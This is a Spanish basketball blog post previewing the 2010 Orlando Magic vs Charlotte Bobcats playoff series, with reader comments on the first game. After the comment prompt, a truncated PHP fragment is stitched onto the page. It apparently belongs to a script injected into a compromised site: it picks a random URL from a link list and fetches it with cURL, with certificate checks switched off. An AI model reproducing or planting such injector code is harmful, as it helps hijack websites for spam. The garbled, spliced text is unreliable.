Análisis Orlando Magic vs Charlotte Bobcats

17 de April de 2010 por Love Denise

Regular: 3-1 para Orlando

Magic: P. a favor: 102,8 – P. en contra: 95,3
Bobcats: P. a favor: 95,3 – P. en contra: 93,8

La temporada arrancaba para los Magic con un debate abierto sobre si la incorporación de Carter en lugar de Turkoglu sería beneficiosa para el equipo. En los primeros partidos, Van Gundy parecía no encontrar la tecla adecuada para poner en marcha la maquinaria de Florida y presenciamos encuentros donde Carter se iba a los 25 puntos pero con 25 tiros, mientras Howard se limitaba a bloquear y a esperar a que alguien le pasara la bola aunque fuera por casualidad. Afortunadamente para ellos, a medida que la temporada avanzaba, cada uno fue acoplándose a su rol y Van Gundy volvió a darse cuenta de que el mejor pívot de la NBA servía para algo más que para defender. El rodillo lo vimos tras el All-Star, dónde los Magic se han marcado un 23-5, ganando desde entonces a Cleveland (dos veces), Lakers , Nuggets y Mavs.

De esas 5 derrotas, una fue en casa, precisamente ante los Bobcats, equipo “Made in Larry Brown”, rocoso, pesado y muy bueno a nivel defensivo. El trío exterior Jackson – Wallace -Felton son los encargados de llevar la pelota hasta el aro rival, mientras, por dentro, Brown dispone de una batería de pívots mancos en ataque, pero destinados a defender atrás lo más fuerte posible.

Claves de la Eliminatoria:

– Control de la zona: Parar a Dwight Howard será una de las mayores preocupaciones de Brown. Para ello, dispone de un gran número de pivots (Mohammed, Chandler, Ratliff y Thomas) para frenarle. El mal porcentaje de tiros libres de Howard hará que los Bobcats no duden en mandarlo a la línea e impedir cualquier canasta fácil en su aro.

– Profundidad de banquillo: Si hay algo de lo que pueda presumir Stan Van Gundy, es de su fondo de armario. Los Magic tienen posiblemente la mejor plantilla del campeonato y eso les permite no depender de un par de jugadores. Cualquiera puede convertirse en el líder de su equipo en un momento determinado. En cambio, Larry Brown no dispone de tantas armas en el banco. Hughes es un lastre y Tyrus Thomas va camino de ser un bluff.

– Tiro de 3 puntos: Hay una gran diferencia entre estos dos equipos en este apartado. Los Magic han acabado la Regular Season con la friolera cifra de 841 triples anotados (más de 10 por partido de media), incluyendo a 7 jugadores por encima de un triple anotado por encuentro. En cambio, por los Bobcats, que han registrado casi 400 triples menos anotados, sólo Stephen Jackson ofrece ciertas garantías a la hora de tirar triples, por lo que la defensa del perímetro de los Bobcats será esencial para intentar dar la sorpresa en la eliminatoria.

Agenda:

Game 1: Domingo 18 a las 23:30 hora española
Game 2: Miércoles 21 a las 1:00 hora española
Game 3: Sábado 24 a las 20:00 hora española.
Game 4:Lunes 26. Hora no disponible todavía.

Pronóstico: Orlando debe superar esta eliminatoria, aunque no será un paseo para ellos. 4-2

Comenta

6 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Bueno, pues los Magic han ganado el primer encuentro de forma más cómoda de la que yo me esperaba, ha sido un partido en todo momento controlado por los de Florida aunque en ningun momento se despegaron de los Bobcats
    Los jugadores se portaron bien y se cumplió lo que vaticiné. Muchísima diferencia en el tiro de 3, 13 triples de Magic por sólo 3 de Bobcats, excesiva dependencia del trío Felton-Wallace-Jackson en ataque. comentar también que Howard tuvo problemas de faltas, y estuvo bien marcado por los pesados y rocosos pivots de Charlotte, además falló bastantes tiros libres.

      Citar

  2. Love Denise dice:
    #2

    ah, y muy mal Carter, muy fallón y muy chupón sabiendo que no le estabn entrando. Menos mal que tuvo problemas de faltas y “sólo” jugó 30 minutos, si no, se tira 25 tiros.

      Citar

  3. Love Denise dice:
    #3

    bueno, se me olvidó comentar el buen partido defensivo de Howard con 9 chapas, Felton se ha ido con unos cuantos gorros a casa

      Citar

  4. kantonyo dice:
    #4

    Love, no he podido ver este partido, aunque lo tengo bajado para poder verlo cuando tenga un rato. A que se debe que Howard se quedara sólo en 5 puntos y tirando sólo 4 lanzamientos??? TAn buena ha sido la defensa de Ratliff y Diaw???

    Saludos!

      Citar

  5. Love Denise dice:
    #5

    bueno, en mi opinión, la defensa de Ratliff y Chandler ha sido bastante buena, así como las ayudas exteriores de los aleros de los Bobcats, claro que, eso supuso en varias ocasiones que los tiradores Magic tirasen a placer desde el exterior.
    Howard aportó poco en ataque, tan solo un gancho en el 1er cuarto y un mate casi al final (cuando los bobcats se habían puesto a 5), también jugó menos de lo habitual por problemas de faltas. La verdad, es que los tiradores hicieron un trabajo tan bueno que no hizo falta la anotación de Howard, la primera parte fue para enmancarla (un vendaval magic), en la 2º se relajaron un poco aunque yo no ví nunca peligrar el 1-0

      Citar

  6. daniel toledano dice:
    #6

    howard es el jugador que mas chapas hace y nelson uno de los mejores bases

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>